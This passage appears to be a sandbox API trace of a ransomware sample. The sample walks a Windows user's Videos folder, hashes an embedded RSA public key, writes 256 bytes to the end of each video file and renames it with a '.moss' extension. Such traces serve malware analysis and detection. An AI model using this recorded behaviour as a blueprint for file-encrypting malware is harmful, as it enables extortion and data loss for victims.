(HeapHandle=0xcd0000, Flags=0x0, Size=0x90) returned 0x3b4cd28 [0172.509] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0172.509] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0172.509] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4cd28 | out: hHeap=0xcd0000) returned 1 [0172.509] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x90) returned 0x3b4cd28 [0172.509] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0172.509] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0172.509] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4cd28 | out: hHeap=0xcd0000) returned 1 [0172.509] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x90) returned 0x3b4cd28 [0172.509] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.509] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.509] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4cd28 | out: hHeap=0xcd0000) returned 1 [0172.509] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x90) returned 0x3b4cd28 [0172.509] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.509] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.509] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4cd28 | out: hHeap=0xcd0000) returned 1 [0172.509] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x90) returned 0x3b4cd28 [0172.509] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.509] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b4b098 [0172.509] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\gOI6FhRK7 r-pcVYvKd\\O8XDzJfnVQ\\") returned="O8XDzJfnVQ\\" [0172.509] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c6d8 [0172.509] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2f030 [0172.509] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\gOI6FhRK7 r-pcVYvKd\\") returned="gOI6FhRK7 r-pcVYvKd\\" [0172.509] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b50 [0172.509] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="Videos\\" [0172.510] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b51ca0 [0172.510] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0172.510] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c6d8 [0172.510] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0172.510] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0172.510] PathFindFileNameW (pszPath="") returned="" [0172.510] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x90) returned 0x3b4cd28 [0172.510] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\gOI6FhRK7 r-pcVYvKd\\O8XDzJfnVQ\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbb15ed50, ftCreationTime.dwHighDateTime=0x1d5df03, ftLastAccessTime.dwLowDateTime=0x339cfac0, ftLastAccessTime.dwHighDateTime=0x1d5d865, ftLastWriteTime.dwLowDateTime=0x339cfac0, ftLastWriteTime.dwHighDateTime=0x1d5d865, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0172.510] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\gOI6FhRK7 r-pcVYvKd\\O8XDzJfnVQ\\03tKuIswO4GFmRXy.mkv") returned=".mkv" [0172.510] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\gOI6FhRK7 r-pcVYvKd\\O8XDzJfnVQ\\03tKuIswO4GFmRXy.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\goi6fhrk7 r-pcvyvkd\\o8xdzjfnvq\\03tkuiswo4gfmrxy.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0172.510] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=12906) returned 1 [0172.510] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0172.513] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x3244, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.513] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0172.514] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0172.514] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0x326a, lpOverlapped=0x0) returned 1 [0172.514] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0172.514] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f3) returned 0x3b39e58 [0172.514] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0172.514] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0172.514] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2f030) returned 1 [0172.515] CryptCreateHash (in: hProv=0xd2f030, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0172.515] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0172.515] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0172.515] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x11) returned 0x35e06d0 [0172.515] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0172.515] GetLastError () returned 0x0 [0172.516] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0172.516] CryptReleaseContext (hProv=0xd2f030, dwFlags=0x0) returned 1 [0172.516] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0172.516] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0172.516] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0172.516] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0172.516] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0172.516] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x558) returned 0x3b48a18 [0172.516] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x326a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.516] WriteFile (in: hFile=0x664, lpBuffer=0xd57fe0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0xd57fe0*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0172.517] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\gOI6FhRK7 r-pcVYvKd\\O8XDzJfnVQ\\03tKuIswO4GFmRXy.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\goi6fhrk7 r-pcvyvkd\\o8xdzjfnvq\\03tkuiswo4gfmrxy.mkv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\gOI6FhRK7 r-pcVYvKd\\O8XDzJfnVQ\\03tKuIswO4GFmRXy.mkv.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\goi6fhrk7 r-pcvyvkd\\o8xdzjfnvq\\03tkuiswo4gfmrxy.mkv.moss")) returned 1 [0172.518] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\gOI6FhRK7 r-pcVYvKd\\O8XDzJfnVQ\\8LH-.avi") returned=".avi" [0172.518] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\gOI6FhRK7 r-pcVYvKd\\O8XDzJfnVQ\\8LH-.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\goi6fhrk7 r-pcvyvkd\\o8xdzjfnvq\\8lh-.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0172.518] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=99704) returned 1 [0172.518] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0172.521] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x18552, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.521] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0172.522] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0172.522] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0x18578, lpOverlapped=0x0) returned 1 [0172.522] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0172.523] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f3) returned 0x3b39e58 [0172.523] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0172.523] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0172.523] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2f030) returned 1 [0172.524] CryptCreateHash (in: hProv=0xd2f030, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0172.524] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0172.524] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0172.524] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x11) returned 0x35e06d0 [0172.524] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0172.524] GetLastError () returned 0x0 [0172.524] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0172.524] CryptReleaseContext (hProv=0xd2f030, dwFlags=0x0) returned 1 [0172.524] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0172.524] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0172.524] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0172.524] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0172.525] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0172.525] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x558) returned 0x3b48a18 [0172.525] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x18578, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.525] WriteFile (in: hFile=0x664, lpBuffer=0xd57fe0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0xd57fe0*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0172.525] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\gOI6FhRK7 r-pcVYvKd\\O8XDzJfnVQ\\8LH-.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\goi6fhrk7 r-pcvyvkd\\o8xdzjfnvq\\8lh-.avi"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\gOI6FhRK7 r-pcVYvKd\\O8XDzJfnVQ\\8LH-.avi.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\goi6fhrk7 r-pcvyvkd\\o8xdzjfnvq\\8lh-.avi.moss")) returned 1 [0172.528] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\gOI6FhRK7 r-pcVYvKd\\O8XDzJfnVQ\\cXJq9ZAkeCSN.flv") returned=".flv" [0172.528] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\gOI6FhRK7 r-pcVYvKd\\O8XDzJfnVQ\\cXJq9ZAkeCSN.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\goi6fhrk7 r-pcvyvkd\\o8xdzjfnvq\\cxjq9zakecsn.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0172.528] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=69407) returned 1 [0172.528] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0172.531] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x10ef9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.531] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0172.532] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0172.532] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0x10f1f, lpOverlapped=0x0) returned 1 [0172.532] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0172.532] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f3) returned 0x3b39e58 [0172.532] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0172.532] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0172.532] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2f030) returned 1 [0172.533] CryptCreateHash (in: hProv=0xd2f030, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0172.533] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0172.533] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0172.533] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x11) returned 0x35e06d0 [0172.533] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0172.533] GetLastError () returned 0x0 [0172.533] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0172.533] CryptReleaseContext (hProv=0xd2f030, dwFlags=0x0) returned 1 [0172.533] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0172.534] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0172.534] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0172.534] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0172.534] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0172.534] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x558) returned 0x3b48a18 [0172.534] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x10f1f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.535] WriteFile (in: hFile=0x664, lpBuffer=0xd57fe0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0xd57fe0*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0172.535] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\gOI6FhRK7 r-pcVYvKd\\O8XDzJfnVQ\\cXJq9ZAkeCSN.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\goi6fhrk7 r-pcvyvkd\\o8xdzjfnvq\\cxjq9zakecsn.flv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\gOI6FhRK7 r-pcVYvKd\\O8XDzJfnVQ\\cXJq9ZAkeCSN.flv.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\goi6fhrk7 r-pcvyvkd\\o8xdzjfnvq\\cxjq9zakecsn.flv.moss")) returned 1 [0172.536] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\gOI6FhRK7 r-pcVYvKd\\O8XDzJfnVQ\\hEFla2O9Gdxlhd.swf") returned=".swf" [0172.536] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\gOI6FhRK7 r-pcVYvKd\\O8XDzJfnVQ\\hEFla2O9Gdxlhd.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\goi6fhrk7 r-pcvyvkd\\o8xdzjfnvq\\hefla2o9gdxlhd.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0172.537] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=101715) returned 1 [0172.537] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0172.540] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x18d2d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 